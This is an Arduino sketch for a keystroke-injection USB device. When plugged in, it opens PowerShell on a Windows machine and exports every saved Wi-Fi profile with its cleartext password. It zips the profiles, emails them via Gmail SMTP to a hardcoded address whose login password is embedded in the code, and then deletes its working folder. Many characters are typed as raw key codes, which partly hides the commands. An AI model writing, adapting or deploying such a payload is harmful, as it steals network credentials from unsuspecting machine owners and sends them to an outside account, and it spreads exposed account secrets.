#include <Keyboard.h>

void setup(){
  // Start Keyboard and Mouse
  Keyboard.begin();
  // Start Payload
  delay(1000);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.print("d");
  Keyboard.release(KEY_LEFT_GUI);
  delay(100);
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.print("r");
  Keyboard.release(KEY_LEFT_GUI);
  delay(500);
  Keyboard.print("cmd");
  delay(500);
  Keyboard.write(KEY_RETURN);
  delay(1500);
  Keyboard.print("powershell");
  delay(200);
  Keyboard.write(KEY_RETURN);
  delay(8000);
  Keyboard.print("mkdir Gerlopod ");
  Keyboard.write(60);
  Keyboard.print(" cd Gerlopod ");
  Keyboard.write(60);
  Keyboard.print(" netsh wlan export profile key");
  Keyboard.write(41);
  Keyboard.print("clear ");
  Keyboard.write(60);
  Keyboard.print(" Compress");
  Keyboard.write(47);
  Keyboard.print("Archive ");
  Keyboard.write(47);
  Keyboard.print("U ");
  Keyboard.write(47);
  Keyboard.print("Path .");
  Keyboard.write(96);
  Keyboard.write(125);
  Keyboard.print(".xml ");
  Keyboard.write(47);
  Keyboard.print("DestinationPath NetProfile.zip ");
  Keyboard.write(60);
  Keyboard.print(" $SMTPInfo ");
  Keyboard.write(41);
  Keyboard.print(" New");
  Keyboard.write(47);
  Keyboard.print("Object Net.Mail.SmtpClient");
  Keyboard.write(42);
  Keyboard.write(45);
  Keyboard.print("smtp.gmail.com");
  Keyboard.write(45);
  Keyboard.print(",587");
  Keyboard.write(40);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $SMTPInfo.EnableSsl ");
  Keyboard.write(41);
  Keyboard.print(" $true ");
  Keyboard.write(60);
  Keyboard.print(" $SMTPInfo.Credentials ");
  Keyboard.write(41);
  Keyboard.print(" New");
  Keyboard.write(47);
  Keyboard.print("Object System.Net.NetworkCredential");
  Keyboard.write(42);
  Keyboard.write(45);
  Keyboard.print("tramorio84");
  Keyboard.press(KEY_RIGHT_ALT);
  Keyboard.write(59);
  Keyboard.release(KEY_RIGHT_ALT);
  Keyboard.print("gmail.com");
  Keyboard.write(45);
  Keyboard.print(", ");
  Keyboard.write(45);
  Keyboard.print("Politto%9");
  Keyboard.write(45);
  Keyboard.write(40);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail ");
  Keyboard.write(41);
  Keyboard.print(" New");
  Keyboard.write(47);
  Keyboard.print("Object System.Net.Mail.MailMessage ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail.From ");
  Keyboard.write(41);
  Keyboard.print(" ");
  Keyboard.write(45);
  Keyboard.print("tramorio84");
  Keyboard.press(KEY_RIGHT_ALT);
  Keyboard.write(59);
  Keyboard.release(KEY_RIGHT_ALT);
  Keyboard.print("gmail.com");
  Keyboard.write(45);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail.To.Add");
  Keyboard.write(42);
  Keyboard.write(45);
  Keyboard.print("tramorio84");
  Keyboard.press(KEY_RIGHT_ALT);
  Keyboard.write(59);
  Keyboard.release(KEY_RIGHT_ALT);
  Keyboard.print("gmail.com");
  Keyboard.write(45);
  Keyboard.write(40);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail.Subject ");
  Keyboard.write(41);
  Keyboard.print(" ");
  Keyboard.write(45);
  Keyboard.print("Network Profiles");
  Keyboard.write(45);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail.Body ");
  Keyboard.write(41);
  Keyboard.print(" ");
  Keyboard.write(45);
  Keyboard.print("WiFi profiles of the machine...");
  Keyboard.write(45);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" $ReportEmail.Attachments.Add");
  Keyboard.write(42);
  Keyboard.write(64);
  Keyboard.print("C");
  Keyboard.write(62);
  Keyboard.print("$env");
  Keyboard.write(62);
  Keyboard.print("HOMEPATH");
  Keyboard.write(96);
  Keyboard.print("Gerlopod");
  Keyboard.write(96);
  Keyboard.print("NetProfile.zip");
  Keyboard.write(64);
  Keyboard.write(40);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" timeout 5 ");
  Keyboard.write(60);
  Keyboard.print(" $SMTPInfo.Send");
  Keyboard.write(42);
  Keyboard.print("$ReportEmail");
  Keyboard.write(40);
  Keyboard.print(" ");
  Keyboard.write(60);
  Keyboard.print(" exit");
  delay(200);
  Keyboard.write(KEY_RETURN);
  delay(10000);
  Keyboard.print("rmdir ");
  Keyboard.write(38);
  Keyboard.print("Q ");
  Keyboard.write(38);
  Keyboard.print("S Gerlopod ");
  Keyboard.write(94);
  Keyboard.write(94);
  Keyboard.print(" exit");
  delay(200);
  Keyboard.write(KEY_RETURN);
}

// Unused
void loop() {}
